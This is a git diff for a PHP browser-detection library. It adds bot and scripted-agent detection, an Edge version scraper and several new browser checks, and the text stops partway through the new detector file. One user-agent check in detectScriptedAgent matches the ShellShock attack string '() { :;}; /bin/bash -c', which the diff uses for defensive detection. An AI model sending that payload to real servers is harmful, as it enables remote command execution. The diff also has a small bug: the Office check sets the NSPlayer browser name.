diff --git a/.gitattributes b/.gitattributes index 5b67882..b8faf42 100644 --- a/.gitattributes +++ b/.gitattributes @@ -12,3 +12,4 @@ /phpunit.xml.dist export-ignore /README.md export-ignore /ruleset.xml export-ignore +/scripts export-ignore diff --git a/.gitignore b/.gitignore index 81b9258..86d9b11 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ composer.lock phpunit.xml vendor +.idea \ No newline at end of file diff --git a/CHANGELOG.md b/CHANGELOG.md index bb0199d..314c589 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ # CHANGELOG +## 7.0.0 (released 2017-xx-xx) + +- ... + ## 6.1.2 (released 2016-12-28) - Added wkhtmltopdf detection diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 0ca2ed1..c80e864 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -10,7 +10,6 @@ Contributions are welcome, and are accepted via pull requests. Please review the * Send a coherent commit history, making sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash](http://git-scm.com/book/en/Git-Tools-Rewriting-History) them before submitting. * You may also need to [rebase](http://git-scm.com/book/en/Git-Branching-Rebasing) to avoid merge conflicts. - ## Running Tests You will need an install of [Composer](https://getcomposer.org) before continuing. diff --git a/LICENSE b/LICENSE index dfe9a79..4be9f19 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ The MIT License (MIT) -Copyright (c) 2013-2017 Chris Schuld +Copyright (c) 2013-present Chris Schuld Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in diff --git a/README.md b/README.md index cee8a05..0050a5d 100644 --- a/README.md +++ b/README.md @@ -51,16 +51,13 @@ The Browser class allows you to detect a user's browser and version. * Lynx * Safari * Chrome - * Navigator - * GoogleBot - * Yahoo! 
Slurp - * W3C Validator + * Android Navigator + * UC Browser * BlackBerry * IceCat * Nokia S60 OSS Browser * Nokia Browser * MSN Browser - * MSN Bot * Netscape Navigator * Galeon * NetPositive @@ -69,14 +66,16 @@ The Browser class allows you to detect a user's browser and version. * Yandex Browser * Comodo Dragon * Samsung Browser - * wkhtmltopdf ### Usage ```php use Sinergi\BrowserDetector\Browser; -$browser = new Browser(); +$browser = new Browser(); + +//You can also provide a userAgent string if you don't wish to detect the current browser +//$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { echo 'Please upgrade your browser.'; @@ -97,6 +96,92 @@ if ($browser->getName() === Browser::IE && $browser->isCompatibilityMode()) { } ``` +## Scripted Agent Detection + +The ScriptedAgent class allows you to detect scripted agents (bots, spiders, tools) + +### Scripted Agents Detected + +Spiders + + * GoogleBot + * Baidu + * Bing + * MSN + * Yahoo! Slurp + * W3C Spiders + * Yandex + * Apple + * Paper.li + * Majestic12 + * Livelap + * Scoop.it + * Who.is + * Proximic + +Web Surveys + + * Ahrefs + * MetaURI + * Netcraft + * Browsershots + * MageReport + * SocialRank.io + * Gluten Free + * Ubermetrics + * Verisign IPS-Agent + +Exploits + + * ShellShock + +Web Preview bots + + * ICQ + * Google Web + * Facebook + * Bing + * Twitter + * Skype + +Tools + + * wkHTMLtoPDF + * W3C Validator + * WebDAV + * TLSProbe + * Wget + * Zgrab + +Generic + + * Google Favicon + * Curl + * Python + * GoLang + * Perl + * Java + +Ad bots + + * Google + * Microsoft + * AdBeat + +### Usage + +```php +use Sinergi\BrowserDetector\Browser; + +$browser = new Browser(); + +$scriptedAgent = $browser->detectScriptedAgent(); +if ($scriptedAgent!==false) +{ + die("Detected ".$scriptedAgent->getName()." which is a ".$scriptedAgent->getType().". 
Info: ".$scriptedAgent->getInfoURL()); +} +``` + ## OS Detection The OS class allows you to detect a user's operating system and version. diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php new file mode 100644 index 0000000..864e592 --- /dev/null +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -0,0 +1,156 @@ + 'Could not fetch current version from ChangeWindows', + 'invalid_version' => 'Windows version is invalid', + 'could_not_fetch_page' => 'Could not fetch page from ChangeWindows' + ); + + public static function fetchVersions() + { + $windowsVersions = json_decode(file_get_contents(__DIR__ . '/windowsVersions.json'), true); + if (!count($windowsVersions)) { + $currentVersion = explode('.', self::fetchCurrentVersion(), 2); + if (!isset($currentVersion[0])) { + throw new Exception(self::$errors['invalid_version']); + } + $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); + self::writeWindowsVersions($windowsVersions); + } else { + reset($windowsVersions); + $firstVersion = key($windowsVersions); + end($windowsVersions); + $lastVersion = key($windowsVersions); + + try { + $result = self::fetchVersion($windowsVersions, $firstVersion); + $windowsVersions = $result; + } catch (Exception $e) { + } + + $windowsVersions = self::fetchVersion($windowsVersions, $lastVersion); + self::writeWindowsVersions($windowsVersions); + } + } + + private static function fetchVersion($windowsVersions, $version) + { + $siblingVersions = self::fetchPage($version); + $windowsVersions[$version] = true; + self::writeWindowsVersions($windowsVersions); + + if (isset($siblingVersions[0]) && !isset($windowsVersions[$siblingVersions[0]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[0]); + } + + if (isset($siblingVersions[1]) && !isset($windowsVersions[$siblingVersions[1]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[1]); + } + + return 
$windowsVersions; + } + + private static function writeWindowsVersions($windowsVersions) + { + ksort($windowsVersions); + file_put_contents(__DIR__ . '/windowsVersions.json', json_encode($windowsVersions, JSON_PRETTY_PRINT)); + } + + private static function fetchCurrentVersion() + { + $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + $content = explode('class="timeline"', $content, 2); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + $content = explode('build"', $content[1], 2); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); + if (!isset($matches[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + return $matches[1]; + } + + private static function fetchPage($version) + { + $url = "https://changewindows.org/build/{$version}/pc"; + $content = file_get_contents($url); + $siblingVersions = self::fetchSiblingVersions($content); + self::fetchEdgeVersion($content); + return $siblingVersions; + } + + private static function fetchEdgeVersion($content) + { + preg_match('/]*> *Edge ([\d\.]*) *<\/h4>/', $content, $edge); + preg_match('/]*>EdgeHTML ([\d\.]*)<\/h4>/', $content, $edgeHtml); + + if (isset($edge[1]) && isset($edgeHtml[1])) { + self::writeEdgeVersion($edgeHtml[1], $edge[1]); + } + return null; + } + + private static function writeEdgeVersion($edgeHtml, $edge) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + if (!isset($currentVersions[$edgeHtml])) { + $currentVersions[$edgeHtml] = $edge; + ksort($currentVersions); + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . 
PHP_EOL; + } + $data = << *(\d+) *name = (string)$name; - return $this; } @@ -132,7 +131,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -144,13 +142,11 @@ public function isBrowser($name) * Set the version of the browser. * * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -169,50 +165,102 @@ public function getVersion() } /** - * Set the Browser to be a robot. - * - * @param bool $isRobot + * Detects scripted agents (robots / bots) + * Returns a resolved ScriptedAgent object if detected. + * Otherwise returns false. * - * @return $this + * @return ScriptedAgent|bool */ - public function setIsRobot($isRobot) + public function detectScriptedAgent() { - $this->isRobot = (bool)$isRobot; + $ua = $this->getUserAgent()->getUserAgentString(); + if (stripos($ua, 'bot') !== false || + stripos($ua, 'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== 
false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + ) { + $scriptedAgent = new ScriptedAgent($ua); + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { + return false; + } else { + return $scriptedAgent; + } + } else { + return false; + } + } + /** + * @param bool $isChromeFrame + * @return $this + */ + public function setIsChromeFrame($isChromeFrame) + { + $this->isChromeFrame = (bool)$isChromeFrame; return $this; } /** - * Is the browser from a robot (ex Slurp,GoogleBot)? + * Used to determine if the browser is actually "chromeframe". 
* * @return bool */ - public function getIsRobot() + public function getIsChromeFrame() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isRobot; + return $this->isChromeFrame; } /** * @return bool */ - public function isRobot() + public function isChromeFrame() { - return $this->getIsRobot(); + return $this->getIsChromeFrame(); } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ - public function setIsChromeFrame($isChromeFrame) + public function setIsWebkit($isWebkit) { - $this->isChromeFrame = (bool)$isChromeFrame; - + $this->isWebkit = (bool)$isWebkit; return $this; } @@ -221,32 +269,30 @@ public function setIsChromeFrame($isChromeFrame) * * @return bool */ - public function getIsChromeFrame() + public function getIsWebkit() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isChromeFrame; + return $this->isWebkit; } /** * @return bool */ - public function isChromeFrame() + public function isWebkit() { - return $this->getIsChromeFrame(); + return $this->getIsWebkit(); } /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -273,14 +319,44 @@ public function isFacebookWebView() } /** - * @param UserAgent $userAgent + * @param bool $isTwitterWebView + * @return $this + */ + public function setIsTwitterWebView($isTwitterWebView) + { + $this->isTwitterWebView = (bool) $isTwitterWebView; + return $this; + } + + /** + * Used to determine if the browser is actually "Twitter". 
* + * @return bool + */ + public function getIsTwitterWebView() + { + if (!isset($this->name)) { + BrowserDetector::detect($this, $this->getUserAgent()); + } + + return $this->isTwitterWebView; + } + + /** + * @return bool + */ + public function isTwitterWebView() + { + return $this->getIsTwitterWebView(); + } + + /** + * @param UserAgent $userAgent * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -300,7 +376,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 5156188..4b01f79 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -7,6 +7,7 @@ class BrowserDetector implements DetectorInterface const FUNC_PREFIX = 'checkBrowser'; protected static $userAgentString; + protected static $edgeVersionsMap = null; /** * @var Browser @@ -46,16 +47,14 @@ class BrowserDetector implements DetectorInterface 'Samsung', 'Chrome', 'OmniWeb', + 'UCBrowser', //before Android // common mobile 'Android', 'BlackBerry', 'Nokia', 'Gsa', - // common bots - 'Robot', - // wkhtmltopdf before Safari - 'Wkhtmltopdf', // WebKit base check (post mobile and others) + 'AppleNews', 'Safari', // everyone else 'NetPositive', @@ -65,12 +64,23 @@ class BrowserDetector implements DetectorInterface 'Phoenix', 'Amaya', 'Lynx', + 'NSPlayer', + 'Office', 'Shiretoko', 'IceCat', 'Iceweasel', 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); + /** + * @return array + */ + public static function getEdgeVersionsMap() + { + if (self::$edgeVersionsMap) return self::$edgeVersionsMap; + return self::$edgeVersionsMap = require __DIR__ . '/edgeVersionMap.php'; + } + /** * Routine to determine the browser type. 
* @@ -92,6 +102,8 @@ public static function detect(Browser $browser, UserAgent $userAgent = null) self::checkChromeFrame(); self::checkFacebookWebView(); + self::checkTwitterWebView(); + self::checkWebkit(); foreach (self::$browsersList as $browserName) { $funcName = self::FUNC_PREFIX . $browserName; @@ -120,6 +132,22 @@ public static function checkChromeFrame() return false; } + /** + * Determine if the browser is a wekit webview. + * + * @return bool + */ + public static function checkWebkit() + { + if (strpos(self::$userAgentString, 'AppleWebKit/') !== false) { + self::$browser->setIsWebkit(true); + + return true; + } + + return false; + } + /** * Determine if the user is using Facebook. * @@ -136,6 +164,22 @@ public static function checkFacebookWebView() return false; } + /** + * Determine if the user is using Twitter. + * + * @return bool + */ + public static function checkTwitterWebView() + { + if (strpos(self::$userAgentString, 'Twitter for') !== false) { + self::$browser->setIsTwitterWebView(true); + + return true; + } + + return false; + } + /** * Determine if the user is using a BlackBerry. * @@ -173,25 +217,6 @@ public static function checkBrowserBlackBerry() return false; } - /** - * Determine if the browser is a robot. - * - * @return bool - */ - public static function checkBrowserRobot() - { - if (stripos(self::$userAgentString, 'bot') !== false || - stripos(self::$userAgentString, 'spider') !== false || - stripos(self::$userAgentString, 'crawler') !== false - ) { - self::$browser->setIsRobot(true); - - return true; - } - - return false; - } - /** * Determine if the browser is Internet Explorer. 
* @@ -456,11 +481,16 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { - $version = explode('Edge/', self::$userAgentString); - if (isset($version[1])) { - self::$browser->setVersion((float)$version[1]); - } self::$browser->setName(Browser::EDGE); + preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); + if (sizeof($matches)>1) { + // todo: implement edge html version + $edgeVersionsMap = self::getEdgeVersionsMap(); + // todo: match versions in between + if (isset($edgeVersionsMap[$matches[1]])) { + self::$browser->setVersion($edgeVersionsMap[$matches[1]]); + } + } return true; } @@ -731,7 +761,7 @@ public static function checkBrowserIceCat() */ public static function checkBrowserNokia() { - if (preg_match("/Nokia([^\/]+)\/([^ SP]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Nokia([^\\/]+)\\/([^ SP]+)/i", self::$userAgentString, $matches)) { self::$browser->setVersion($matches[2]); if (stripos(self::$userAgentString, 'Series60') !== false || strpos(self::$userAgentString, 'S60') !== false @@ -755,7 +785,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -781,7 +811,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ 
-901,20 +931,7 @@ public static function checkBrowserAmaya() return false; } - /** - * Determine if the browser is Safari. - * - * @return bool - */ - public static function checkBrowserWkhtmltopdf() - { - if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { - self::$browser->setName(Browser::WKHTMLTOPDF); - return true; - } - return false; - } /** * Determine if the browser is Safari. * @@ -958,7 +975,7 @@ public static function checkBrowserYandex() return false; } - + /** * Determine if the browser is Comodo Dragon / Ice Dragon / Chromodo. * @@ -987,7 +1004,7 @@ public static function checkBrowserDragon() */ public static function checkBrowserAndroid() { - // Navigator + // Android Navigator if (stripos(self::$userAgentString, 'Android') !== false) { if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { if (isset($matches[1])) { @@ -1001,6 +1018,104 @@ public static function checkBrowserAndroid() return true; } + // Dalvik (Android OS) + if (stripos(self::$userAgentString, 'Dalvik/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'Dalvik')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::DALVIK); + + return true; + } + + return false; + } + + /** + * Determine if the browser is UCBrowser. + * + * @return bool + */ + public static function checkBrowserUCBrowser() + { + // Navigator + if (stripos(self::$userAgentString, 'UCBrowser/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'UCBrowser')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::UCBROWSER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Windows Media Player. 
+ * + * @return bool + */ + public static function checkBrowserNSPlayer() + { + // Navigator + if (stripos(self::$userAgentString, 'NSPlayer/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'NSPlayer')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Microsoft Office. + * + * @return bool + */ + public static function checkBrowserOffice() + { + // Navigator + if (stripos(self::$userAgentString, 'Microsoft Office') !== false) { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is the Apple News app. + * + * @return bool + */ + public static function checkBrowserAppleNews() + { + // Navigator + if (stripos(self::$userAgentString, 'AppleNews/') !== false) { + if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { + if (isset($matches[1])) { + self::$browser->setVersion($matches[1]); + } + } else { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + } + self::$browser->setName(Browser::APPLE_NEWS); + + return true; + } + return false; } } diff --git a/src/OsDetector.php b/src/OsDetector.php index 40b0611..8510e90 100644 --- a/src/OsDetector.php +++ b/src/OsDetector.php @@ -209,6 +209,11 @@ private static function checkWindows(Os $os, UserAgent $userAgent) return true; } + if (stripos($userAgent->getUserAgentString(), 'NSPlayer/') !== false) { + $os->setName(Os::WINDOWS); + $os->setVersion(Os::VERSION_UNKNOWN); + return true; + } return false; } diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php new file mode 100644 index 0000000..90aef4d --- /dev/null +++ b/src/ScriptedAgent.php @@ -0,0 +1,185 @@ +setUserAgent($userAgent); + } elseif (null === $userAgent || is_string($userAgent)) { + 
$this->setUserAgent(new UserAgent($userAgent)); + } else { + throw new InvalidArgumentException(); + } + } + + /** + * Set the name of the ScriptedAgent. + * + * @param string $name + * + * @return void + */ + public function setName($name) + { + $this->name = (string)$name; + } + + /** + * Return the name of the ScriptedAgent. + * + * @return string + */ + public function getName() + { + if (!isset($this->name)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->name; + } + + /** + * Set the type of the ScriptedAgent. + * + * @param string $type + * + * @return void + */ + public function setType($type) + { + $this->type = (string)$type; + } + + /** + * Return the type of the ScriptedAgent. + * + * @return string + */ + public function getType() + { + if (!isset($this->type)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->type; + } + + /** + * Set the info URL for the ScriptedAgent. + * + * @param string $url + * + * @return void + */ + public function setInfoURL($url) + { + $this->url = (string)$url; + } + + /** + * Return the info URL for the ScriptedAgent. 
+ * + * @return string + */ + public function getInfoURL() + { + if (!isset($this->url)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + return $this->url; + } + + /** + * @param UserAgent $userAgent + * + * @return void + */ + public function setUserAgent(UserAgent $userAgent) + { + $this->userAgent = $userAgent; + } + + /** + * @return UserAgent + */ + public function getUserAgent() + { + return $this->userAgent; + } +} diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php new file mode 100644 index 0000000..220c3d6 --- /dev/null +++ b/src/ScriptedAgentDetector.php @@ -0,0 +1,755 @@ +getUserAgent(); + } + self::$userAgentString = $userAgent->getUserAgentString(); + + self::$scriptedAgent->setName(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setType(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setInfoURL(ScriptedAgent::UNKNOWN); + + foreach (self::$robotsList as $robotName) { + $funcName = self::FUNC_PREFIX . $robotName; + + if (self::$funcName()) { + return true; + } + } + + return false; + } + + /** + * Determine if the browser is wkHTMLtoPDF + * + * @return bool + */ + public static function checkRobotwkHTMLtoPDF() + { + if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WKHTMLTOPDF); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://wkhtmltopdf.org/"); + return true; + } + return false; + } + + /** + * Determine if the browser is the ICQ preview. + * + * @return bool + */ + public static function checkRobotICQ() + { + //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. + //But to be extra safe, also check for the russian language which the ICQ bot sets. 
+ if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ICQ); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://icq.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is GoogleBot, or a google ads bot. + * + * @return bool + */ + public static function checkRobotGoogle() + { + if (stripos(self::$userAgentString, "Googlebot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "AdsBot-Google") !== false + || stripos(self::$userAgentString, "Mediapartners-Google") !== false + || stripos(self::$userAgentString, "Google-Adwords") !== false + || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false + ) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "Google Favicon") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); + return true; + } + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); + return true; + } + return 
false; + } + + /** + * Determine if the agent is the Baidu spider. + * + * @return bool + */ + public static function checkRobotBaidu() + { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BAIDU); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Facebook preview bot. + * + * @return bool + */ + public static function checkRobotFacebook() + { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the bing spider, bing preview bot, or MSN bot + * + * @return bool + */ + public static function checkRobotBing() + { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if 
(stripos(self::$userAgentString, "BingPreview/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yahoo Slurp! Spider. + * + * @return bool + * + */ + public static function checkRobotSlurp() + { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SLURP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is the twitter preview bot. + * + * @return bool + */ + public static function checkRobotTwitter() + { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::TWITTER); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); + return true; + } + return false; + } + + /** + * Determine if the agent is the skype preview bot. + * + * @return bool + */ + public static function checkRobotSkype() + { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SKYPE); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://www.skype.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is the W3C Validator tool. 
+ * + * @return bool + */ + public static function checkRobotW3CValidator() + { + if (stripos(self::$userAgentString, "W3C_Validator/") !== false || + stripos(self::$userAgentString, "Validator.nu/") !== false || + stripos(self::$userAgentString, "W3C-mobileOK/DDC-") !== false || + stripos(self::$userAgentString, "W3C_I18n-Checker/") !== false || + stripos(self::$userAgentString, "FeedValidator/") !== false || + stripos(self::$userAgentString, "Jigsaw/") !== false || + stripos(self::$userAgentString, "JW3C_Unicorn/") !== false + ) { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + if (stripos(self::$userAgentString, "NING/") !== false || + stripos(self::$userAgentString, "W3C-checklink") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yandex spider. + * + * @return bool + */ + public static function checkRobotYandex() + { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::YANDEX); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AppleBot + * + * @return bool + */ + public static function checkRobotApple() + { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Paper.li bot. 
